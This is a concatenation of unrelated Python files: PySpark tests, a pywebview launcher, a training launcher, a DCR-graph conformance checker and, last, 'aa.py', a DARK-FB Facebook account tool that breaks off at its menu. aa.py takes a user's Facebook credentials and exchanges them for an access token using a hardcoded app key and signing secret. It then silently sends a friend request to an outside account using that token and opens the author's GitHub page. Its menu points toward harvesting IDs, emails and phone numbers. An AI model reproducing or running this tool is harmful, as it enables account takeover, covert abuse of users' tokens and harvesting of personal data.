from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
python_exec = sys.executable or os.environ.get("PYSPARK_PYTHON")
daemon = Popen([python_exec, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content, dir=None):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name)
else:
os.makedirs(os.path.join(self.programDir, dir))
path = os.path.join(self.programDir, dir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name + ext)
else:
path = os.path.join(self.programDir, dir, zip_name + ext)
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def create_spark_package(self, artifact_name):
group_id, artifact_id, version = artifact_name.split(":")
self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
|<?xml version="1.0" encoding="UTF-8"?>
|<project xmlns="http://maven.apache.org/POM/4.0.0"
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
| http://maven.apache.org/xsd/maven-4.0.0.xsd">
| <modelVersion>4.0.0</modelVersion>
| <groupId>%s</groupId>
| <artifactId>%s</artifactId>
| <version>%s</version>
|</project>
""" % (group_id, artifact_id, version)).lstrip(),
os.path.join(group_id, artifact_id, version))
self.createFileInZip("%s.py" % artifact_id, """
|def myfunc(x):
| return x + 1
""", ".jar", os.path.join(group_id, artifact_id, version),
"%s-%s" % (artifact_id, version))
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out.decode('utf-8'))
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency(self):
"""Submit and test a script with a dependency on a Spark Package"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency_on_cluster(self):
"""Submit and test a script with a dependency on a Spark Package on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, "--master",
"local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_user_configuration(self):
"""Make sure user configuration is respected (SPARK-19307)"""
script = self.createTempFile("test.py", """
|from pyspark import SparkConf, SparkContext
|
|conf = SparkConf().set("spark.test_config", "1")
|sc = SparkContext(conf = conf)
|try:
| if sc._conf.get("spark.test_config") != "1":
| raise Exception("Cannot find spark.test_config in SparkContext's conf.")
|finally:
| sc.stop()
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local", script],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode, msg="Process failed with error:\n {0}".format(out))
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_parallelize_eager_cleanup(self):
with SparkContext() as sc:
temp_files = os.listdir(sc._temp_dir)
rdd = sc.parallelize([0, 1, 2])
post_parallalize_temp_files = os.listdir(sc._temp_dir)
self.assertEqual(temp_files, post_parallalize_temp_files)
def test_set_conf(self):
# This is for an internal use case. When there is an existing SparkContext,
# SparkSession's builder needs to set configs into SparkContext's conf.
sc = SparkContext()
sc._conf.set("spark.test.SPARK16224", "SPARK16224")
self.assertEqual(sc._jsc.sc().conf().get("spark.test.SPARK16224"), "SPARK16224")
sc.stop()
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
class ConfTests(unittest.TestCase):
def test_memory_conf(self):
memoryList = ["1T", "1G", "1M", "1024K"]
for memory in memoryList:
sc = SparkContext(conf=SparkConf().set("spark.python.worker.memory", memory))
l = list(range(1024))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class KeywordOnlyTests(unittest.TestCase):
class Wrapped(object):
@keyword_only
def set(self, x=None, y=None):
if "x" in self._input_kwargs:
self._x = self._input_kwargs["x"]
if "y" in self._input_kwargs:
self._y = self._input_kwargs["y"]
return x, y
def test_keywords(self):
w = self.Wrapped()
x, y = w.set(y=1)
self.assertEqual(y, 1)
self.assertEqual(y, w._y)
self.assertIsNone(x)
self.assertFalse(hasattr(w, "_x"))
def test_non_keywords(self):
w = self.Wrapped()
self.assertRaises(TypeError, lambda: w.set(0, y=1))
def test_kwarg_ownership(self):
# test _input_kwargs is owned by each class instance and not a shared static variable
class Setter(object):
@keyword_only
def set(self, x=None, other=None, other_x=None):
if "other" in self._input_kwargs:
self._input_kwargs["other"].set(x=self._input_kwargs["other_x"])
self._x = self._input_kwargs["x"]
a = Setter()
b = Setter()
a.set(x=1, other=b, other_x=2)
self.assertEqual(a._x, 1)
self.assertEqual(b._x, 2)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = list(map(gammaln, x))
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
stats_dict = s.asDict()
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())
stats_sample_dict = s.asDict(sample=True)
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
self.assertSequenceEqual(
[0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
self.assertSequenceEqual(
[0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
from pyspark.tests import *
if not _have_scipy:
print("NOTE: Skipping SciPy tests as it does not seem to be installed")
if not _have_numpy:
print("NOTE: Skipping NumPy tests as it does not seem to be installed")
if xmlrunner:
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.main()
if not _have_scipy:
print("NOTE: SciPy tests were skipped as it does not seem to be installed")
if not _have_numpy:
print("NOTE: NumPy tests were skipped as it does not seem to be installed")
|
main.py
|
from threading import Thread, Lock
import logging
import webview
from time import sleep
from server import run_server
server_lock = Lock()
logger = logging.getLogger(__name__)
def url_ok(url, port):
# Use httplib on Python 2
try:
from http.client import HTTPConnection
except ImportError:
from httplib import HTTPConnection
try:
conn = HTTPConnection(url, port)
conn.request("GET", "/")
r = conn.getresponse()
return r.status == 200
except:
logger.exception("Server not started")
return False
if __name__ == '__main__':
logger.debug("Starting server")
t = Thread(target=run_server)
t.daemon = True
t.start()
logger.debug("Checking server")
while not url_ok("127.0.0.1", 23948):
sleep(0.1)
logger.debug("Server started")
webview.create_window("My first pywebview application",
"http://127.0.0.1:23948",
min_size=(640, 480))
|
launcher.py
|
import argparse, yaml, os, signal
import multiprocessing
from athena import gpu_ops as ad
_procs = []
def signal_handler(signal, frame):
print("SIGINT signal caught, stop Training")
for proc in _procs:
proc.kill()
exit(0)
def launch(target, args):
file_path = args.config
settings = yaml.load(open(file_path).read(), Loader=yaml.FullLoader)
for k, v in settings['shared'].items():
os.environ[k] = str(v)
args.num_local_worker = int(settings["launch"]["worker"])
for i in range(args.num_local_worker):
proc = multiprocessing.Process(target=start_worker, args=[target, args])
_procs.append(proc)
for i in range(int(settings["launch"]["server"])):
proc = multiprocessing.Process(target=start_server)
_procs.append(proc)
if settings["launch"]["scheduler"] != 0:
proc = multiprocessing.Process(target=start_sched)
_procs.append(proc)
signal.signal(signal.SIGINT, signal_handler)
for proc in _procs:
proc.start()
for proc in _procs:
proc.join()
def start_sched():
os.environ["DMLC_ROLE"] = "scheduler"
ad.scheduler_init()
ad.scheduler_finish()
def start_server():
os.environ["DMLC_ROLE"] = "server"
ad.server_init()
ad.server_finish()
def start_worker(target, args):
os.environ["DMLC_ROLE"] = "worker"
ad.worker_init()
target(args)
ad.worker_finish()
if __name__ =='__main__':
signal.signal(signal.SIGINT, signal_handler)
parser = argparse.ArgumentParser()
parser.add_argument("config")
parser.add_argument("-n", type=int, default=1)
parser.add_argument("--sched", action="store_true")
args = parser.parse_args()
file_path = args.config
settings = yaml.load(open(file_path).read(), Loader=yaml.FullLoader)
for k, v in settings['shared'].items():
os.environ[k] = str(v)
if args.sched:
_procs.append(multiprocessing.Process(target=start_sched))
for i in range(args.n):
_procs.append(multiprocessing.Process(target=start_server))
for proc in _procs:
proc.start()
for proc in _procs:
proc.join()
__all__ = [
'launch'
]
|
main.py
|
"""The main file of the dcr-cc that is executed"""
from threading import Thread
import datetime
import process_mining.cmd_parser as cmd_parser
import process_mining.eventlog_parser as eventlog_parser
from process_mining.conf_data import ConformanceAnalysisData, TraceConformanceAnalysisData
from process_mining.graph import DCRGraph
from process_mining.marking import Marking
from process_mining.eventlog import Event
def perform_conformance_checking(trace, ca):
"""
The perform conformance checking method gets a trace as an input and then simulates the model with
the constraints retrieved from the DCR graph.
:param ca: The conformance analysis data object that is used for the overall conformance checking
:param trace: the trace that is checked within this thread
:return:
"""
marking = Marking.get_initial_marking()
trace_conformance_data = TraceConformanceAnalysisData(trace)
for event in trace.Events:
node = dcr_graph.get_node_by_name(event.EventName)
marking.perform_transition_node(node, event, trace_conformance_data)
pending_violation = False
if len(marking.PendingResponse) != 0:
for pending in marking.PendingResponse:
if pending in marking.Included:
trace_conformance_data.add_violating_pending(pending.ActivityName)
pending_violation = True
time_stamp = None
if trace.Events is not []:
time_stamp = trace.Events[-1].Timestamp + datetime.timedelta(seconds=1)
trace.append_event(Event.create_end_event(time_stamp, pending_violation))
if trace_conformance_data.HasViolations:
ca.append_conformance_data(trace_conformance_data)
def main():
"""
Program main method starts by parsing the DCR graph afterwards retrieving the Event Log
subsequently the conformance is checked
:return:
"""
global dcr_graph
# input
dcr_graph = DCRGraph.get_graph_instance(xml_path)
event_log = eventlog_parser.get_event_log(data_path, custom_role)
ca = ConformanceAnalysisData()
# throughput
# if parallel is set: a thread pool is created
if parallel:
threads = []
for trace in event_log.Traces:
t = Thread(target=perform_conformance_checking, args=(trace, ca))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
# sequential conformance checking (Debugging purposes)
else:
for trace in event_log.Traces:
perform_conformance_checking(trace, ca)
# output
create_conformance_output(ca, event_log)
eventlog_parser.write_csv_file_to_disk_shift(event_log, output_pcm)
def create_conformance_output(ca, event_log):
"""
Creates the console output of the program
:param ca:
:param event_log:
:return:
"""
if len(ca.ViolatingTraces) > 0:
# Calculate ratios and replay fitness, Round up to two digits
violating_case_ratio = len(ca.ViolatingTraces) / len(event_log.Traces)
replay_fitness = 1 - violating_case_ratio
replay_fitness = "%.2f" % replay_fitness
violating_case_ratio *= 100
violating_case_ratio = "%.2f" % violating_case_ratio
conformance_ratio = 100 - float(violating_case_ratio)
# Output
print('All in all, {} of {} violated the process model'.format(len(ca.ViolatingTraces), len(event_log.Traces)))
print('The ratio of violating cases is: {}%'.format(violating_case_ratio))
print("Thus, the conformance ratio is: {}%".format(conformance_ratio))
print("The replay fitness is: {}%".format(replay_fitness))
# Sort the dictionaries for the descending order of occurrences
sorted_including_violation = sorted(ca.ViolatedActivities.items(), key=lambda kv: kv[1], reverse=True)
sorted_violated_roles = sorted(ca.ViolatedRoles.items(), key=lambda kv: kv[1], reverse=True)
sorted_violated_pending = sorted(ca.ViolatedPending.items(), key=lambda kv: kv[1], reverse=True)
sorted_violated_connections = sorted(ca.ViolatedConnections.items(), key=lambda kv: kv[1], reverse=True)
sorted_violated_cases = sorted(ca.create_violated_traces_dict().items(), key=lambda kv: kv[1], reverse=True)
# Print all detailed information
print("\n{} process paths failed the events\n".format(len(sorted_violated_cases)))
for process_path in sorted_violated_cases:
print("The process path:\n\"{}\" \t was non-conformant {} times ".format(process_path[0], process_path[1]))
for included_violation in sorted_including_violation:
print('The activity \"{}\" has been executed {} times even though it was not included'.format(
included_violation[0], included_violation[1]))
for violated_role in sorted_violated_roles:
print('The role \"{}\" was misused \"{}\" times'.format(violated_role[0], violated_role[1]))
for violated_pending in sorted_violated_pending:
print('The activity {} was pending at the end in {} cases'.format(violated_pending[0], violated_pending[1]))
for violated_connection in sorted_violated_connections:
print('The {} was violated in {} traces'.format(violated_connection[0], violated_connection[1]))
else:
print('The conformance ratio is 100%')
def add_dcr_graph_for_test(test_graph):
"""
For unit tests with the main class a dcr graph can be added
:param test_graph: the created test graph
:return:
"""
global dcr_graph
dcr_graph = test_graph
if __name__ == '__main__':
# input parameters
args = cmd_parser.parse_args()
data_path = args.eventLog
xml_path = args.XmlDcr
output_pcm = args.outputPathPCM
custom_role = args.customRole
parallel = False
dcr_graph = None
columns_work = None
main()
|
aa.py
|
#!/usr/bin/python
# coding=utf-8
# (ZeDD) RedDemons
# Source : Python2 Gerak"
# DARK-FB version1.7
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Warna-#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;93m█████████
\033[1;93m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;93m█\033[1;92m▼▼▼▼▼ \033[1;92m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;93m█ \033[1;92m \033[1;92m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;93m█\033[1;92m▲▲▲▲▲\033[1;92m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96mDiamond-1
\033[1;93m█████████ \033[1;92m«----------✧----------»
\033[1;93m ██ ██
\033[1;93m╔════════════════════════════════════════════╗
\033[1;93m║\033[1;96m* \033[1;93mAuthor \033[1;93m: \033[1;93mBrother•|Mr.Rendy \033[1;93m ║
\033[1;93m║\033[1;96m* \033[1;93mGitHub \033[1;93m: \033[1;93m\033[4mMasi Rahasia Script Nya😑\033[0m \033[1;93m ║
\033[1;93m╚════════════════════════════════════════════╝"""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;91m║--\033[1;91m> \033[1;95m1.\033[1;96m Login"
print "\033[1;92m║--\033[1;91m> \033[1;95m2.\033[1;96m Login using token"
print "\033[1;93m║--\033[1;91m> \033[1;95m0.\033[1;96m Exit"
print "\033[1;95m║"
msuk = raw_input("\033[1;96m╚═\033[1;1mD \033[1;93m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;96m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;95m[+] \033[1;93mPassword \033[1;93m:\033[1;95m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://github.com/CrazyLolz100')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;94m║--\033[1;91m> \033[1;93m1.\033[1;95m User information"
print "\033[1;94m║--\033[1;91m> \033[1;93m2.\033[1;95m Get Id/email/hp"
